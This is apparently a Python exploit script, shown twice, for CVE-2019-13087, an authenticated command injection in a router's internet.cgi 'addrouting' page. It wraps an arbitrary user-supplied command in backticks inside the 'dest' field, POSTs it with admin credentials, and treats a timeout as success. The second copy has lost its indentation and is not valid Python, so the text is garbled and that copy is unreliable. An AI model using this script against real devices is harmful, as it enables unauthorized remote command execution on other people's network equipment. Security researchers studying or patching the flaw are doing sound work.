ChrisTheCoolHut/CVE-2019-13087.py

## CVE-2019-13087.py
import requests
import argparse

base_url = "http://{}/cgi-bin/internet.cgi"
data = {}

# python CVE-2019-13087.py 192.168.1.1 admin password 'sleep 10'
def main():
	parser = argparse.ArgumentParser()

	parser.add_argument("Host")
	parser.add_argument("Username")
	parser.add_argument("Password")
	parser.add_argument("Command")

	args = parser.parse_args()

	''' The post data expects further arguments, however the system command
	is called before parsing other arguments, so you don't actually need
	them. '''

	url = base_url.format(args.Host)
	data['page'] = 'addrouting'
	data['dest'] = '`{}`'.format(args.Command)

	try:
		resp = requests.post(url, auth=(args.Username,args.Password),
				data=data, timeout=5.0)
		print(resp.text)
	except requests.exceptions.ConnectionError as e:
		print("[-] Connection Error")
	except requests.exceptions.ReadTimeout as e:
		print("[+] Command successful")
	import requests
	import argparse

	base_url = "http://{}/cgi-bin/internet.cgi"
	data = {}

	# python CVE-2019-13087.py 192.168.1.1 admin password 'sleep 10'
	def main():
	parser = argparse.ArgumentParser()

	parser.add_argument("Host")
	parser.add_argument("Username")
	parser.add_argument("Password")
	parser.add_argument("Command")

	args = parser.parse_args()

	''' The post data expects further arguments, however the system command
	is called before parsing other arguments, so you don't actually need
	them. '''

	url = base_url.format(args.Host)
	data['page'] = 'addrouting'
	data['dest'] = '`{}`'.format(args.Command)

	try:
	resp = requests.post(url, auth=(args.Username,args.Password),
	data=data, timeout=5.0)
	print(resp.text)
	except requests.exceptions.ConnectionError as e:
	print("[-] Connection Error")
	except requests.exceptions.ReadTimeout as e:
	print("[+] Command successful")